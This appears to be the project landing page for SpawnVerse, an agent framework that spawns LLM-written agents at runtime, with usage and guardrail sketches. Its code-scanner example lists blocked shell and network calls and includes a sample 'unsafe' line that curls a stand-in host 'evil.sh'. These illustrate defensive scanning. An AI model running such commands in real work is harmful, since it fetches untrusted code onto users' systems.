Open Source · MIT · Groq / LLaMA · By sajosam

SpawnVerse

The universe where agents are born from tasks.
Zero pre-built agents. Give it one sentence — it invents the team.

spawnverse — python run.py
$ python examples/01_general/run.py

══════════════════════════════════════════════
SPAWNVERSE — Self-Spawning Cognitive Agent System
run_id = 20250322_142031
Research top 5 EVs in India under 25 lakhs...
══════════════════════════════════════════════

PHASE 1 — DECOMPOSE TASK
[1] ev_specs_researcher deps=[] | Gathers EV specifications...
[2] pricing_analyst deps=[] | Researches pricing and subsidies...
[3] charging_infra_agent deps=[] | Maps charging infrastructure...
[4] ownership_cost_synthesizer deps=[1,2,3] | Calculates 5yr TCO...
[5] final_report_agent deps=[1,2,3,4] | Generates final ranking...

PHASE 2 — WAVE 1 Gathering (parallel)
[████████░░] 80% ev_specs_researcher: main work done
[████████░░] 80% pricing_analyst: main work done
[██████░░░░] 60% charging_infra_agent: work done
─────────────────────────────────────────────
ev_specs_researcher DONE 8.2s quality=0.87 drift=0.91
pricing_analyst DONE 7.6s quality=0.82 drift=0.88
charging_infra_agent DONE 6.9s quality=0.79 drift=0.85

PHASE 3 — WAVE 2 Synthesis
final_report_agent DONE 12.1s quality=0.91 drift=0.93

Agents: 5 (5 ok, 0 failed) · Fossils: 5 · Tokens: 14,821
0 Pre-built agents
4 Guardrail layers
Fossil memory
1 pip install

The problem

Every framework makes you
define agents first.

LangChain, CrewAI, AutoGen, LangGraph — all require you to write the roles and prompts before the task arrives. SpawnVerse inverts this.

[Diagram] Traditional: developer defines agents manually → fixed agents (AgentA · AgentB · AgentC) → task arrives, forced into the predefined team → output; agents forget on exit. SpawnVerse: task arrives as a plain-English description → orchestrator LLM invents the team → spawned agents (code written at runtime, run in parallel) → fossil memory; every death leaves a record.

Traditional Framework          SpawnVerse
Developer defines agents       Task defines agents
Fixed team structure           Team emerges from task
Same agents every run          New agents every run
You write the code             LLM writes the code
Agents forget everything       Agents leave fossil memory
No memory isolation            Namespace-locked writes

How it works

One task in.
A workforce out.

SpawnVerse decomposes your task, writes agent code at runtime, runs agents safely in parallel, and collects structured output.

01
You describe the task
Plain English. Numbers, locations, budgets. As specific as you want. No config. No YAML.
natural language
02
LLM designs the agent team
Orchestrator asks the LLM what agents this task needs — roles, tasks, dependencies. Returns a JSON plan.
decomposition
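To make the decomposition step concrete, here is an illustrative shape for the JSON plan — the field names below are assumptions for this sketch, not SpawnVerse's actual schema. The dependency lists are what let the orchestrator group agents into waves:

```python
# Illustrative decomposition plan (field names are assumptions, not
# SpawnVerse's actual schema). Each agent gets a role and a list of
# dependency ids; the dependency graph defines the execution waves.
plan = {
    "agents": [
        {"id": 1, "role": "ev_specs_researcher", "deps": []},
        {"id": 2, "role": "pricing_analyst", "deps": []},
        {"id": 3, "role": "charging_infra_agent", "deps": []},
        {"id": 4, "role": "ownership_cost_synthesizer", "deps": [1, 2, 3]},
        {"id": 5, "role": "final_report_agent", "deps": [1, 2, 3, 4]},
    ]
}

# Agents with no dependencies form Wave 1 and can start immediately;
# everything else waits for its dependencies' outputs.
wave1 = [a["role"] for a in plan["agents"] if not a["deps"]]
print(wave1)
```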
03
Code written and scanned
LLM writes a full Python main() for each agent. Guardrail scans for dangerous patterns. Subprocess runs with OS resource limits.
code generation + security
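A minimal sketch of the pre-execution code scan, with the pattern list inferred from the guardrail description below (the real scanner may use a different mechanism or ruleset). If any banned pattern appears in the generated source, the file never runs:

```python
import re

# Banned-pattern list inferred from the docs; illustrative, not the
# actual SpawnVerse ruleset.
BANNED = [r"\bos\.system\b", r"\bsubprocess\b", r"\beval\s*\(",
          r"\bexec\s*\(", r"__import__", r"\bsocket\b", r"requests\.post"]

def scan(source: str) -> list[str]:
    """Return the banned patterns found in generated agent code."""
    return [p for p in BANNED if re.search(p, source)]

safe = "def main():\n    return {'result': 42}\n"
unsafe = "import subprocess\nsubprocess.run(['curl', 'evil.sh'])\n"
print(scan(safe))    # []
print(scan(unsafe))  # pattern hits -> file is blocked, never executed
```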
04
Agents run in parallel waves
Wave 1 gathers information simultaneously. Wave 2 reads those outputs and synthesizes. Agent-to-agent messages via typed bus.
parallel execution
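The wave model above can be sketched with the stdlib primitive the Features section names (`ThreadPoolExecutor`); the agent bodies here are stand-ins, not SpawnVerse's generated code:

```python
from concurrent.futures import ThreadPoolExecutor

# Stand-in for a generated agent's main(); real agents run as subprocesses.
def run_agent(name: str) -> str:
    return f"{name}: done"

wave1 = ["ev_specs_researcher", "pricing_analyst", "charging_infra_agent"]

# Wave 1: all gathering agents start simultaneously, bounded by max_workers.
with ThreadPoolExecutor(max_workers=5) as pool:
    wave1_results = list(pool.map(run_agent, wave1))

# Wave 2: synthesis runs only after Wave 1 outputs are in shared memory.
wave2_result = run_agent("final_report_agent")
print(wave1_results, wave2_result)
```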
05
Every death leaves a fossil
Constitution, quality score, intent drift — all saved. Future runs search past fossils. The system accumulates intelligence.
fossil record

Features

Everything built in.

One design principle: agents should emerge from the task, not be defined before it.

Zero Pre-Built Agents
Every agent invented at runtime. No YAML. No decorators. No class definitions before the task.
🧠
Distributed Memory
Any agent reads any namespace. Writes locked to own namespace. Enforced at code-gen and DB layer. SQLite WAL.
🔀
Parallel Waves
ThreadPoolExecutor for Wave 1. All gathering agents start simultaneously. Configurable concurrency limit.
🌱
Recursive Spawning
Agents can request sub-agents. Quality scoring before any spawn is fulfilled. Depth limited by config.
🦴
Fossil Record
Every agent death deposits constitution + scores. Auto-indexed into ChromaDB. Future agents search them semantically.
📊
Intent Drift Scoring
Measures alignment between root task and each agent's output. The first framework to surface this metric.
🛡️
4-Layer Guardrails
Code scan → Budget → Output validator → Semantic judge. Every output independently verified before memory write.
🔍
Vector DB / RAG
Connect ChromaDB with your documents. Agents get rag_context() and rag_search(). Internal data stays internal.
📦
One Dependency
pip install groq — that's it. No Docker to start. ChromaDB optional. Runs anywhere Python 3.10+ runs.
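The intent-drift metric above isn't specified in detail here, so the following is only a toy proxy to show the idea: score each agent's output against the root task, where a low score flags an agent that wandered off-task. A production version would more plausibly use embedding cosine similarity than this character-level ratio:

```python
from difflib import SequenceMatcher

# Toy drift proxy: similarity between the root task and an agent's output
# summary. Illustrative only — not SpawnVerse's actual metric.
def drift_score(root_task: str, output_summary: str) -> float:
    return SequenceMatcher(None, root_task.lower(), output_summary.lower()).ratio()

task = "research top 5 evs in india under 25 lakhs"
on_topic = "top 5 evs in india under 25 lakhs, ranked by tco"
off_topic = "a history of steam locomotives in europe"

print(round(drift_score(task, on_topic), 2))   # high: output tracks the task
print(round(drift_score(task, off_topic), 2))  # low: agent drifted
```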

Memory model

Read everything.
Write only your own.

The distributed memory contract prevents agents from overwriting each other while giving every agent full visibility.

[Diagram] Distributed memory (SQLite WAL, namespace-partitioned): flight_agent writes result + log; hotel_agent writes result + log; budget_agent and report_agent read all namespaces but write only their own. Rule: WRITE own · READ all.
system
  project · plan · task_desc   ← orchestrator writes
flight_agent
  result · log · context       ← only flight_agent writes
hotel_agent
  result · log                 ← only hotel_agent writes
budget_agent
  result · log                 ← reads flight + hotel, writes own only
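The read-all / write-own contract can be sketched over SQLite in a few lines. The table layout and function names here are assumptions for illustration; the real enforcement happens at both the code-generation and DB layers:

```python
import sqlite3

# Illustrative schema — SpawnVerse's actual tables may differ.
conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA journal_mode=WAL")  # WAL as described; ineffective for :memory:
conn.execute("CREATE TABLE memory (namespace TEXT, key TEXT, value TEXT)")

def write(agent: str, namespace: str, key: str, value: str) -> None:
    # Writes are locked to the caller's own namespace.
    if namespace != agent:
        raise PermissionError(f"{agent} may not write to {namespace}")
    conn.execute("INSERT INTO memory VALUES (?, ?, ?)", (namespace, key, value))

def read_all(agent: str) -> list:
    # Any agent may read every namespace.
    return conn.execute("SELECT namespace, key, value FROM memory").fetchall()

write("flight_agent", "flight_agent", "result", "AI-302, 08:45")
try:
    write("hotel_agent", "flight_agent", "result", "overwrite attempt")
except PermissionError as e:
    print("blocked:", e)
print(read_all("budget_agent"))
```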

Guardrails

4 layers before anything
reaches shared memory.

Every agent passes 4 independent safety checks. A blocked output never corrupts other agents.

Pipeline: 01 Code Scan (before subprocess) → 02 Budget (per-agent token limit) → 03 Output Validator (size · structure check) → 04 Semantic Judge (LLM-as-judge) → SHARED MEMORY (safe to write)
01
Code Scanner
Scans generated Python for dangerous patterns before the subprocess ever starts. File never runs if violations found.
os.system · subprocess · eval / exec · __import__ · socket · requests.post
02
Budget Enforcer
Per-agent token limit baked into the agent's injected stdlib. When exhausted, think() returns empty. One runaway agent can't consume the whole run.
per_agent_tokens: 8000 · total token_budget: 80000 · rate-limit backoff
03
Output Validator
Before the result enters shared memory: not None, not empty, not oversized, not an empty dict. Structural checks only.
min 10 chars · max 50 KB · non-empty dict
04
Semantic Judge
LLM-as-judge independently reviews every output for harmful content, PII, misinformation, and prompt injection attempts.
personal data · prompt injection · misinformation · harmful instructions
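Layer 03 is the easiest to pin down from the thresholds stated above (min 10 chars, max 50 KB, non-empty dict), so here is a sketch of those structural checks; the real validator may differ:

```python
# Structural checks only, per the layer-03 description: not None, not empty,
# not oversized, not an empty dict. Thresholds taken from the docs.
def validate_output(result) -> bool:
    if result is None:
        return False
    if isinstance(result, dict):
        return len(result) > 0
    if isinstance(result, str):
        return 10 <= len(result) <= 50 * 1024
    return False

print(validate_output(None))                           # False
print(validate_output({}))                             # False: empty dict
print(validate_output("ok"))                           # False: under 10 chars
print(validate_output({"result": "five EVs ranked"}))  # True
```

Only outputs that pass this layer move on to the semantic judge and, eventually, shared memory.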

Usage

Three lines to start.

Pass a task. Get structured output. Everything else is automatic.

python
# pip install groq
from spawnverse import Orchestrator

Orchestrator().run({
    "description": "Research top 5 EVs in India under 25 lakhs",
    "context": {"buyer_type": "first-time EV buyer"}
})

# ── With config ─────────────────────────────────
from spawnverse import Orchestrator, DEFAULT_CONFIG

Orchestrator({**DEFAULT_CONFIG, "max_depth": 3, "wave1_agents": 5}).run({
    "description": "Your task here", "context": {}
})

# ── With your documents (RAG) ────────────────────
config = {**DEFAULT_CONFIG, "vector_db_enabled": True}

Orchestrator(config).run(
    {"description": "Analyse our Q3 vs market"},
    knowledge_base=["Your internal document text here"]
)

Get started

One command.

Groq API key is free at console.groq.com. No Docker. No other accounts.

Basic install
LLM reasoning only. Zero extra deps.
pip install groq
With vector DB
For RAG over your own documents.
pip install groq chromadb
bash
# Get a free key at console.groq.com
export GROQ_API_KEY=your_key_here

git clone https://github.com/sajosam/spawnverse
cd spawnverse

# Run example 1 — general reasoning
python spawnverse/examples/01_general/run.py

# Pass your own task inline
python spawnverse/examples/01_general/run.py "Research EVs in India under 25L"